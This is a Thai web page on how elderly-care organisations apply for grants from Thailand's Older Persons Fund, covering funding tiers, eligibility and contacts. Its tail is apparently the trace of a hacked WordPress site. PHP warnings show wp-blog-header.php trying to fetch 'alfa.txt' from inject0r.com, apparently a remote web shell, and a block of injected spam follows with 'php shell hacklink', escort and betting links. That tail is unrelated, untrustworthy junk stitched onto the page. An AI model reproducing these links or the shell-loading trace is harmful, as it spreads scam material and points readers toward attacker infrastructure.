การขอสนับสนุนโครงการจากกองทุนผู้สูงอายุ

องค์กรที่ทำงานเกี่ยวข้องกับผู้สูงอายุ ที่ต้องการได้รับสิทธิการขอสนับสนุนโครงการจากกองทุนผู้สูงอายุ เพื่อส่งเสริมกิจกรรมผู้สูงอายุในลักษณะกลุ่ม ชมรม ศูนย์บริการ ศูนย์อเนกประสงค์ในชุมชน มีรายละเอียดดังนี้

“กองทุนผู้สูงอายุ” จัดตั้งขึ้นตามพระราชบัญญัติผู้สูงอายุ พ.ศ. 2546 มาตรา 13 ปัจจุบันสังกัดกรมกิจการผู้สูงอายุ กระทรวงการพัฒนาสังคมและความมั่นคงของมนุษย์ ภายใต้วิสัยทัศน์ “กองทุนผู้สูงอายุเป็นกองทุนเพื่อสนับสนุนการพัฒนาคุณภาพชีวิตผู้สูงอายุ” ตามที่กฎหมายบัญญัติไว้ (ระเบียบคณะกรรมการผู้สูงอายุแห่งชาติ ว่าด้วยการบริหารกองทุน, พ.ศ. 2548) โดยกองทุนผู้สูงอายุ สนับสนุนเงินอุดหนุนโครงการในกิจกรรม หลัก ได้แก่ การสนับสนุนโครงการการมีส่วนร่วมในการดำเนินงานด้านผู้สูงอายุ และการสนับสนุนโครงการส่งเสริมให้มีส่วนร่วมในการเฝ้าระวัง เกื้อกูล และดูแลผู้สูงอายุ

การให้การสนับสนุนโครงการ กรอบวงเงินที่ให้การสนับสนุน แบ่งตามขนาดของโครงการ 

 • โครงการขนาดเล็ก ในวงเงินไม่เกิน 50,000 บาท
 • โครงการขนาดกลาง วงเงินเกิน 50,000 – 300,000 บาท
 • โครงการขนาดใหญ่ วงเงินเกิน 300,000 บาท ขึ้นไป

 

 

 

 

 

 

 

 

 

 

 

ลักษณะโครงการที่จะได้รับการสนับสนุนเงินกองทุน

 • มีวัตถุประสงค์และกระบวนการในการทำงานชัดเจน
 • สร้างการมีส่วนร่วมของบุคคลหรือหน่วยงาน หรือประชาชน
 • โครงการของหน่วยงานภาครัฐควรเป็นโครงการใหม่และเร่งด่วน ที่ไม่ได้ตั้งงบประมาณรองรับและไม่เป็นโครงการต่อเนื่อง
 • เป็นโครงการขององค์กรเอกชนหรือองค์กรของผู้สูงอายุ ที่ไมได้รับการสนับสนุนงบประมาณจากส่วนราชการและแหล่งทุนอื่นๆ เว้นแต่กรณีได้รับแต่ไม่เพียงพอ

ขั้นตอนการสนับสนุนโครงการที่เกี่ยวกับการ คุ้มครอง การส่งเสริม และการสนับสนุนผู้สูงอายุ

ดาวน์โหลดข้อมูลการให้บริการ: http://www.olderfund.dop.go.th/content/view/18/396

ดาวน์โหลดแบบฟอร์มข้อเสนอโครงการ: http://www.olderfund.dop.go.th/download/view_sub/28

ดาวน์โหลดตัวย่างโครงการ: http://www.olderfund.dop.go.th/download/view/313

คุณสมบัติผู้ขอรับการสนับสนุนโครงการจากกองทุนผู้สูงอายุ

องค์กรผู้สูงอายุ/องค์กรที่ทำงานด้านผู้สูงอายุ

กรณีเป็นหน่วยงานภาครัฐ

 • ต้องเป็นหน่วยงานที่มีอำนาจหน้าที่เกี่ยวกับการคุ้มครอง การส่งเสริม และการสนับสนุนผู้สูงอายุ รวมทั้งได้รับมอบหมายให้เป็นหน่วยงานรับผิดชอบในการดำเนินงานตามประกาศสำนักนายกรัฐมนตรี เรื่อง กำหนดหน่วยงานรับผิดชอบในการดำเนินการปฏิบัติตามพระราชบัญญัติผู้สูงอายุ พ.ศ. 2546 หรือมีหน้าที่ดำเนินการในการคุ้มครองการส่งเสริมและสนับสนุนผู้สูงอายุตามประกาศกระทรวงที่เกี่ยวข้องหรือมีหน้าที่ตามกฎหมายในการส่งเสริมกิจกรรมผู้สูงอายุ

กรณีเป็นองค์กรภาคเอกชนหรือองค์กรของผู้สูงอายุ

 • ต้องเป็นองค์กรที่จดทะเบียนเป็นนิติบุคคลหรือได้รับการรับรองเป็นองค์กรสาธารณประโยชน์ตามกฎหมายว่าด้วยการส่งเสริม การจัดสวัสดิการสังคม ซึ่งดำเนินกิจกรรมเกี่ยวกับการคุ้มครอง การส่งเสริม และการสนับสนุนผู้สูงอายุอย่างต่อเนื่องไม่น้อยกว่า 6 เดือน
 • หากเป็นองค์กรที่ไม่ได้จดทะเบียนเป็นนิติบุคคลหรือไม่ได้รับรองเป็นองค์กรสาธารณประโยชน์ตามกฎหมายว่าด้วยการส่งเสริม การจัดสวัสดิการสังคม จะต้องดำเนินกิจกรรมเกี่ยวกับการคุ้มครอง การส่งเสริม และการสนับสนุนผู้สูงอายุต่อเนื่องไม่น้อยกว่า 1 ปี และมีส่วนราชการหรือหน่วยงานของรัฐ หรือองค์กรของผู้สูงอายุที่จดทะเบียนเป็นนิติบุคคล หรือองค์กรสาธารณประโยชน์รับรองว่าเป็นองค์กรที่มีผลงานเกี่ยวกับการคุ้มครอง การส่งเสริม และการสนับสนุนผู้สูงอายุ

หน่วยงานที่ให้การสนับสนุน

ผู้สูงอายุ องค์กรของผู้สูงอายุ หรือ องค์กรที่ทำงานด้านผู้สูงอายุ สามารถติดต่อสอบถามรายละเอียดหรือขอรับการสนับสนุนจากกองทุนผู้สูงอายุ ได้ที่

 • กรุงเทพมหานคร : กองทุนผู้สูงอายุ กรมกิจการผู้สูงอายุ เลขที่ 255 อาคารพิชเยนทรโยธิน ชั้น 1 ภายในบริเวณสถานสงเคราะห์เด็กหญิงราชวิถี ถนนราชวิถี แขวงทุ่งพญาไท เขตราชเทวี กรุงเทพมหานคร 10400 โทรศัพท์ : 02 354 6100 โทรสาร : 02 354 6107
 • ต่างจังหวัด : สำนักงานพัฒนาสังคมและความมั่นคงของมนุษย์จังหวัดที่มีภูมิลำเนา

แหล่งอ้างอิง : http://www.olderfund.dop.go.th/download/view/472

แหล่งอ้างอิง : file:///C:/Users/Mettaya/Downloads/1%20หนังสือกองทุนผู้สูงอายุ.pdf

แหล่งอ้างอิง : http://www.olderfund.dop.go.th/uploads/content/download/5af1131882ee1.pdf

แหล่งอ้างอิง : http://www.dop.go.th/download/knowledge/knowledge_th_20160803162952_1.pdf

Skip to content
Warning: file_get_contents(): SSL operation failed with code 1. OpenSSL Error messages: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed in /newdata/vhosts/thaisynergy.org/httpdocs/wp-blog-header.php on line 22

Warning: file_get_contents(): Failed to enable crypto in /newdata/vhosts/thaisynergy.org/httpdocs/wp-blog-header.php on line 22

Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt): failed to open stream: operation failed in /newdata/vhosts/thaisynergy.org/httpdocs/wp-blog-header.php on line 22

php shell hacklink php shell seobizde.com https://www.jigolokayitci.com/jigololuk-ilani-vermek-istiyorum/ www.jigolosahibinden.com https://www.jigoloajansimiz.xyz/olgun-dul-bayanlar/ jigolo ajansi jigolo siteleri jigolo başvurusu karşıyaka escort sohbet okey oyna süperbahis beylikdüzü escort restbetgiris.co bodrum escort hotforex bedavabonuscum.com kalkinmaatolyesi.org bet bahis Aşık Etme Duası esenyurt escort beylikdüzü escort su kaçağı tespiti betpasgiris.vip sultanbet